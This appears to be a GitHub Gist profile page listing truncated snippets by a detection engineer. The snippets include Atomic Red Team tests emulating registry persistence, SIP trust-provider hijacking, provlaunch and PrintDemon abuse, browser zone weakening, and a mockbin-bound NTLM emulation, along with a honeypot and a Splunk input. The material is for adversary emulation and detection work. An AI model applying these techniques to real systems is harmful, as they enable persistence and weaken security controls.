Skip to content

Instantly share code, notes, and snippets.

View MHaggis's full-sized avatar
:shipit:

Michael Haag MHaggis

:shipit:
469 followers · 92 following
View GitHub Profile
@MHaggis
MHaggis / HoneyMimiclite.py
Created October 31, 2023 18:12
You'll prob need to change line 6 or make a logs dir.
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime
import logging
current_datetime = datetime.now().strftime('%Y%m%d_%H%M%S')
log_file_name = f'logs/app_{current_datetime}.log'
class EmulatedServer(BaseHTTPRequestHandler):
pass
@MHaggis
MHaggis / T1547.yaml
Created October 18, 2023 15:23
Atomic Red Team
- name: 'HKCU - Add Registry Key Under CurrentVersion\Windows'
description: |
This test attempts to add a registry entry under HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
which points to a potential payload "calc.exe". This can be indicative of an attacker trying to achieve persistence or other malicious objectives.
References:
- https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/
- https://persistence-info.github.io/Data/windowsload.html
supported_platforms:
- windows
input_arguments:
@MHaggis
MHaggis / T1553.003.yaml
Created October 11, 2023 11:18
attack_technique: T1553.003
display_name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
atomic_tests:
- name: SIP (Subject Interface Package) Hijacking via Custom DLL
auto_generated_guid: e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675
description: |
Registers a DLL that logs signature checks, mimicking SIP hijacking. This test uses a DLL from
https://github.com/gtworek/PSBits/tree/master/SIP and registers it using regsvr32, thereby causing
the system to utilize it during signature checks, and logging said checks.
supported_platforms:
@MHaggis
MHaggis / SIP_inputs.md
Created October 10, 2023 19:47
Inventory SIP

Place in inputs.conf and watch the SIP roll in.

# Modify for your environment. Make sure the sourcetype matches the analytic as needed.
[powershell://SubjectInterfacePackage]
script = $registryPaths = @("HKLM:\SOFTWARE\Microsoft\Cryptography\Providers","HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0","HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1"); $registryPaths | ForEach-Object {Get-ChildItem -Recurse $_ | ForEach-Object {$key=$_; $props=$key.GetValueNames(); $propDataPairs=@{}; for ($i=0; $i -lt $props.Length; $i++) {$propDataPairs[$props[$i]]=$key.GetValue($props[$i])}; $outputObj=[PSCustomObject]@{Path=$key.PSPath;PSChildName=$key.PSChildName}; $propDataPairs.GetEnumerator() | ForEach-Object {Add-Member -InputObject $outputObj -NotePropertyName $_.Name -NotePropertyValue $_.Val
@MHaggis
MHaggis / T1218.yaml
Created September 26, 2023 18:44
Atomic Test for https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
- name: Provlaunch.exe Executes Arbitrary Command via Registry Key
description: |
Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
- https://twitter.com/0gtweet/status/1674399582162153472
- https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
Registry keys are deleted after successful execution.
supported_platforms:
- windows
executor:
command: |
@MHaggis
MHaggis / T1574.001.yaml
Created September 20, 2023 14:40
#AtomicWednesdays T1574.001 - PrintDemon
- name: PrintDemon
description: |
Atomic Test to emulate PrintDemon.
[Reference](https://github.com/BC-SECURITY/Invoke-PrintDemon)
Also seen on TryHackme - https://tryhackme.com/room/dllhijacking
supported_platforms:
- windows
input_arguments:
dll_path:
description: File path for ualapi.dll
@MHaggis
MHaggis / T1564.003.yaml
Created September 13, 2023 15:46
Mockbin Atomic Test with Headless browsing
- name: Headless Browser Accessing Mockbin
description: |
The following Atomic Red Team test leverages the Chrome headless browser to access a mockbin site. Create your own Mockbin.org site and replace the BIN in the inputs.
supported_platforms:
- windows
input_arguments:
bin_id:
description: Mockbin.org BIN ID
type: string
default: f6b9a876-a826-4ac0-83b8-639d6ad516ec
@MHaggis
MHaggis / getmockbin.py
Created September 11, 2023 14:07
import requests
import os
import json
file_path = "ids.txt"
base_url = "https://mockbin.org/bin"
log_directory = "logs"
script_directory = "scripts"
if not os.path.exists(log_directory):
@MHaggis
MHaggis / FancyNTLMBear.md
Created September 6, 2023 13:45
https://www.virustotal.com/gui/file/52951f2d92e3d547bad86e33c1b0a8622ac391c614efa3c5d167d8a825937179

Original sending to Mockbin (use a new mockbin)

[byte[]]$NTLMType2 =
@(
    0x4e,0x54,0x4c,0x4d,
    0x53,0x53,0x50,0x00,
    0x02,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,
    0x00,0x28,0x00,0x00,
@MHaggis
MHaggis / T1112.yaml
Created September 6, 2023 03:08
Atomic Red Team Test - https://twitter.com/M_haggis/status/1699056847154725107?s=20. Grab one, submit a PR! Be quick, whoever submits first gets a shirt + sticker :)
- name: Modify Internet Zone Protocol Defaults in Current User Registry - cmd
description: |
This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using the reg.exe utility via the command prompt. Such modifications can be indicative of an adversary trying to weaken browser security settings. Upon execution, if successful, the message "The operation completed successfully." will be displayed.
To verify the effects of the test:
1. Open the Registry Editor (regedit.exe).
2. Navigate to "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults".
3. Check for the presence of the "http" and "https" DWORD values set to `0`.
Or run:
```batch